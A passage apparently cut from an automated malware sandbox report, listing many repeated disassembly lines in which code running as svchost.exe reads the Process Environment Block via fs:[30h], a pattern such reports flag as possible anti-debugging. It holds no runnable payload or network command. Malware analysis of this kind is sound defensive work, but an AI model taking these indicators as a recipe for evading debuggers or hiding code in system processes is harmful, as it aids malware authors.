          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364E627 mov eax, dword ptr fs:[00000030h]6_2_0364E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03666620 mov eax, dword ptr fs:[00000030h]6_2_03666620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03668620 mov eax, dword ptr fs:[00000030h]6_2_03668620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363262C mov eax, dword ptr fs:[00000030h]6_2_0363262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE609 mov eax, dword ptr fs:[00000030h]6_2_036AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0364260B mov eax, dword ptr fs:[00000030h]6_2_0364260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672619 mov eax, dword ptr fs:[00000030h]6_2_03672619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE6F2 mov eax, dword ptr fs:[00000030h]6_2_036AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE6F2 mov eax, dword ptr fs:[00000030h]6_2_036AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE6F2 mov eax, dword ptr fs:[00000030h]6_2_036AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE6F2 mov eax, dword ptr fs:[00000030h]6_2_036AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B06F1 mov eax, dword ptr fs:[00000030h]6_2_036B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B06F1 mov eax, dword ptr fs:[00000030h]6_2_036B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0366A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A6C7 mov eax, dword ptr fs:[00000030h]6_2_0366A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C6A6 mov eax, dword ptr fs:[00000030h]6_2_0366C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036666B0 mov eax, dword ptr fs:[00000030h]6_2_036666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634690 mov eax, dword ptr fs:[00000030h]6_2_03634690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03634690 mov eax, dword ptr fs:[00000030h]6_2_03634690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366656A mov eax, dword ptr fs:[00000030h]6_2_0366656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366656A mov eax, dword ptr fs:[00000030h]6_2_0366656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366656A mov eax, dword ptr fs:[00000030h]6_2_0366656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638550 mov eax, dword ptr fs:[00000030h]6_2_03638550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638550 mov eax, dword ptr fs:[00000030h]6_2_03638550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640535 mov eax, dword ptr fs:[00000030h]6_2_03640535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E53E mov eax, dword ptr fs:[00000030h]6_2_0365E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E53E mov eax, dword ptr fs:[00000030h]6_2_0365E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E53E mov eax, dword ptr fs:[00000030h]6_2_0365E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E53E mov eax, dword ptr fs:[00000030h]6_2_0365E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E53E mov eax, dword ptr fs:[00000030h]6_2_0365E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6500 mov eax, dword ptr fs:[00000030h]6_2_036C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704500 mov eax, dword ptr fs:[00000030h]6_2_03704500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365E5E7 mov eax, dword ptr fs:[00000030h]6_2_0365E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036325E0 mov eax, dword ptr fs:[00000030h]6_2_036325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C5ED mov eax, dword ptr fs:[00000030h]6_2_0366C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366C5ED mov eax, dword ptr fs:[00000030h]6_2_0366C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E5CF mov eax, dword ptr fs:[00000030h]6_2_0366E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E5CF mov eax, dword ptr fs:[00000030h]6_2_0366E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036365D0 mov eax, dword ptr fs:[00000030h]6_2_036365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A5D0 mov eax, dword ptr fs:[00000030h]6_2_0366A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A5D0 mov eax, dword ptr fs:[00000030h]6_2_0366A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B05A7 mov eax, dword ptr fs:[00000030h]6_2_036B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B05A7 mov eax, dword ptr fs:[00000030h]6_2_036B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B05A7 mov eax, dword ptr fs:[00000030h]6_2_036B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036545B1 mov eax, dword ptr fs:[00000030h]6_2_036545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036545B1 mov eax, dword ptr fs:[00000030h]6_2_036545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03632582 mov eax, dword ptr fs:[00000030h]6_2_03632582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03632582 mov ecx, dword ptr fs:[00000030h]6_2_03632582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03664588 mov eax, dword ptr fs:[00000030h]6_2_03664588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E59C mov eax, dword ptr fs:[00000030h]6_2_0366E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BC460 mov ecx, dword ptr fs:[00000030h]6_2_036BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365A470 mov eax, dword ptr fs:[00000030h]6_2_0365A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365A470 mov eax, dword ptr fs:[00000030h]6_2_0365A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365A470 mov eax, dword ptr fs:[00000030h]6_2_0365A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366E443 mov eax, dword ptr fs:[00000030h]6_2_0366E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EA456 mov eax, dword ptr fs:[00000030h]6_2_036EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362645D mov eax, dword ptr fs:[00000030h]6_2_0362645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365245A mov eax, dword ptr fs:[00000030h]6_2_0365245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E420 mov eax, dword ptr fs:[00000030h]6_2_0362E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E420 mov eax, dword ptr fs:[00000030h]6_2_0362E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362E420 mov eax, dword ptr fs:[00000030h]6_2_0362E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362C427 mov eax, dword ptr fs:[00000030h]6_2_0362C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B6420 mov eax, dword ptr fs:[00000030h]6_2_036B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366A430 mov eax, dword ptr fs:[00000030h]6_2_0366A430
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03668402 mov eax, dword ptr fs:[00000030h]6_2_03668402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03668402 mov eax, dword ptr fs:[00000030h]6_2_03668402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03668402 mov eax, dword ptr fs:[00000030h]6_2_03668402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036304E5 mov ecx, dword ptr fs:[00000030h]6_2_036304E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036364AB mov eax, dword ptr fs:[00000030h]6_2_036364AB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036644B0 mov ecx, dword ptr fs:[00000030h]6_2_036644B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BA4B0 mov eax, dword ptr fs:[00000030h]6_2_036BA4B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036EA49A mov eax, dword ptr fs:[00000030h]6_2_036EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0362CB7E mov eax, dword ptr fs:[00000030h]6_2_0362CB7E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E4B4B mov eax, dword ptr fs:[00000030h]6_2_036E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E4B4B mov eax, dword ptr fs:[00000030h]6_2_036E4B4B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03702B57 mov eax, dword ptr fs:[00000030h]6_2_03702B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03702B57 mov eax, dword ptr fs:[00000030h]6_2_03702B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03702B57 mov eax, dword ptr fs:[00000030h]6_2_03702B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03702B57 mov eax, dword ptr fs:[00000030h]6_2_03702B57
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6B40 mov eax, dword ptr fs:[00000030h]6_2_036C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C6B40 mov eax, dword ptr fs:[00000030h]6_2_036C6B40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036FAB40 mov eax, dword ptr fs:[00000030h]6_2_036FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D8B42 mov eax, dword ptr fs:[00000030h]6_2_036D8B42
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628B50 mov eax, dword ptr fs:[00000030h]6_2_03628B50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DEB50 mov eax, dword ptr fs:[00000030h]6_2_036DEB50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365EB20 mov eax, dword ptr fs:[00000030h]6_2_0365EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365EB20 mov eax, dword ptr fs:[00000030h]6_2_0365EB20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F8B28 mov eax, dword ptr fs:[00000030h]6_2_036F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036F8B28 mov eax, dword ptr fs:[00000030h]6_2_036F8B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704B00 mov eax, dword ptr fs:[00000030h]6_2_03704B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AEB1D mov eax, dword ptr fs:[00000030h]6_2_036AEB1D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638BF0 mov eax, dword ptr fs:[00000030h]6_2_03638BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638BF0 mov eax, dword ptr fs:[00000030h]6_2_03638BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638BF0 mov eax, dword ptr fs:[00000030h]6_2_03638BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365EBFC mov eax, dword ptr fs:[00000030h]6_2_0365EBFC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BCBF0 mov eax, dword ptr fs:[00000030h]6_2_036BCBF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03650BCB mov eax, dword ptr fs:[00000030h]6_2_03650BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03650BCB mov eax, dword ptr fs:[00000030h]6_2_03650BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03650BCB mov eax, dword ptr fs:[00000030h]6_2_03650BCB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630BCD mov eax, dword ptr fs:[00000030h]6_2_03630BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630BCD mov eax, dword ptr fs:[00000030h]6_2_03630BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630BCD mov eax, dword ptr fs:[00000030h]6_2_03630BCD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DEBD0 mov eax, dword ptr fs:[00000030h]6_2_036DEBD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640BBE mov eax, dword ptr fs:[00000030h]6_2_03640BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640BBE mov eax, dword ptr fs:[00000030h]6_2_03640BBE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E4BB0 mov eax, dword ptr fs:[00000030h]6_2_036E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036E4BB0 mov eax, dword ptr fs:[00000030h]6_2_036E4BB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366CA6F mov eax, dword ptr fs:[00000030h]6_2_0366CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366CA6F mov eax, dword ptr fs:[00000030h]6_2_0366CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366CA6F mov eax, dword ptr fs:[00000030h]6_2_0366CA6F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036DEA60 mov eax, dword ptr fs:[00000030h]6_2_036DEA60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036ACA72 mov eax, dword ptr fs:[00000030h]6_2_036ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036ACA72 mov eax, dword ptr fs:[00000030h]6_2_036ACA72
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03636A50 mov eax, dword ptr fs:[00000030h]6_2_03636A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640A5B mov eax, dword ptr fs:[00000030h]6_2_03640A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03640A5B mov eax, dword ptr fs:[00000030h]6_2_03640A5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366CA24 mov eax, dword ptr fs:[00000030h]6_2_0366CA24
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0365EA2E mov eax, dword ptr fs:[00000030h]6_2_0365EA2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03654A35 mov eax, dword ptr fs:[00000030h]6_2_03654A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03654A35 mov eax, dword ptr fs:[00000030h]6_2_03654A35
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366CA38 mov eax, dword ptr fs:[00000030h]6_2_0366CA38
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BCA11 mov eax, dword ptr fs:[00000030h]6_2_036BCA11
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366AAEE mov eax, dword ptr fs:[00000030h]6_2_0366AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0366AAEE mov eax, dword ptr fs:[00000030h]6_2_0366AAEE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03686ACC mov eax, dword ptr fs:[00000030h]6_2_03686ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03686ACC mov eax, dword ptr fs:[00000030h]6_2_03686ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03686ACC mov eax, dword ptr fs:[00000030h]6_2_03686ACC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03630AD0 mov eax, dword ptr fs:[00000030h]6_2_03630AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03664AD0 mov eax, dword ptr fs:[00000030h]6_2_03664AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03664AD0 mov eax, dword ptr fs:[00000030h]6_2_03664AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638AA0 mov eax, dword ptr fs:[00000030h]6_2_03638AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03638AA0 mov eax, dword ptr fs:[00000030h]6_2_03638AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03686AA4 mov eax, dword ptr fs:[00000030h]6_2_03686AA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363EA80 mov eax, dword ptr fs:[00000030h]6_2_0363EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704A80 mov eax, dword ptr fs:[00000030h]6_2_03704A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03668A90 mov edx, dword ptr fs:[00000030h]6_2_03668A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03656962 mov eax, dword ptr fs:[00000030h]6_2_03656962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03656962 mov eax, dword ptr fs:[00000030h]6_2_03656962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03656962 mov eax, dword ptr fs:[00000030h]6_2_03656962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0367096E mov eax, dword ptr fs:[00000030h]6_2_0367096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0367096E mov edx, dword ptr fs:[00000030h]6_2_0367096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0367096E mov eax, dword ptr fs:[00000030h]6_2_0367096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D4978 mov eax, dword ptr fs:[00000030h]6_2_036D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D4978 mov eax, dword ptr fs:[00000030h]6_2_036D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BC97C mov eax, dword ptr fs:[00000030h]6_2_036BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B0946 mov eax, dword ptr fs:[00000030h]6_2_036B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03704940 mov eax, dword ptr fs:[00000030h]6_2_03704940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B892A mov eax, dword ptr fs:[00000030h]6_2_036B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C892B mov eax, dword ptr fs:[00000030h]6_2_036C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE908 mov eax, dword ptr fs:[00000030h]6_2_036AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036AE908 mov eax, dword ptr fs:[00000030h]6_2_036AE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BC912 mov eax, dword ptr fs:[00000030h]6_2_036BC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628918 mov eax, dword ptr fs:[00000030h]6_2_03628918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03628918 mov eax, dword ptr fs:[00000030h]6_2_03628918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036BE9E0 mov eax, dword ptr fs:[00000030h]6_2_036BE9E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036629F9 mov eax, dword ptr fs:[00000030h]6_2_036629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036629F9 mov eax, dword ptr fs:[00000030h]6_2_036629F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036C69C0 mov eax, dword ptr fs:[00000030h]6_2_036C69C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0363A9D0 mov eax, dword ptr fs:[00000030h]6_2_0363A9D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036649D0 mov eax, dword ptr fs:[00000030h]6_2_036649D0
